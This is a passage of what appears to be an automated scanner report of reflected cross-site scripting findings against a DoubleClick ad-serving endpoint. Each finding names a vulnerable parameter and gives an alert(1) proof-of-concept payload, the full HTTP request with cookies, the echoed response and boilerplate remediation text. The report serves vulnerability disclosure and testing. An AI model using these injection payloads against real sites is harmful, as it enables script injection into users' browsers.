The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a45c"-alert(1)-"e3e5e1bb985 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn5a45c"-alert(1)-"e3e5e1bb985&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... ck.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn5a45c"-alert(1)-"e3e5e1bb985&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=20 ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab078"-alert(1)-"b329366e601 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=ab078"-alert(1)-"b329366e601&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... k%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=ab078"-alert(1)-"b329366e601&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23 ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7a3'-alert(1)-'9507be9971f was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=5c7a3'-alert(1)-'9507be9971f&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... k%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=5c7a3'-alert(1)-'9507be9971f&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23 ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb3b5'-alert(1)-'31e40796ec7 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113bb3b5'-alert(1)-'31e40796ec7&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113bb3b5'-alert(1)-'31e40796ec7&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://ww ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3576"-alert(1)-"854407b15a9 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113c3576"-alert(1)-"854407b15a9&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113c3576"-alert(1)-"854407b15a9&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://ww ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74064"-alert(1)-"20216c724cc was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A74064"-alert(1)-"20216c724cc&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... leclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A74064"-alert(1)-"20216c724cc&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c05'-alert(1)-'a61097db292 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A49c05'-alert(1)-'a61097db292&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... leclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A49c05'-alert(1)-'a61097db292&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97e97'-alert(1)-'22e385047a5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=97e97'-alert(1)-'22e385047a5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 2/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=97e97'-alert(1)-'22e385047a5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/e ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d8ca"-alert(1)-"74b7959faa0 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=6d8ca"-alert(1)-"74b7959faa0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 1/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=6d8ca"-alert(1)-"74b7959faa0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/e ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 473d7"-alert(1)-"9edf1d55749 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=473d7"-alert(1)-"9edf1d55749&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=473d7"-alert(1)-"9edf1d55749&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_ ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1dd'-alert(1)-'82727c93856 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=1f1dd'-alert(1)-'82727c93856&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... 334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=1f1dd'-alert(1)-'82727c93856&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_ ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e29f4"-alert(1)-"a641ff2d0cd was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=e29f4"-alert(1)-"a641ff2d0cd&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
document.write('<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
function DCFlash(id,pVM){ ...[SNIP]... net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=e29f4"-alert(1)-"a641ff2d0cd&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011. ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1f6e'-alert(1)-'7a9c8a63dbf was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
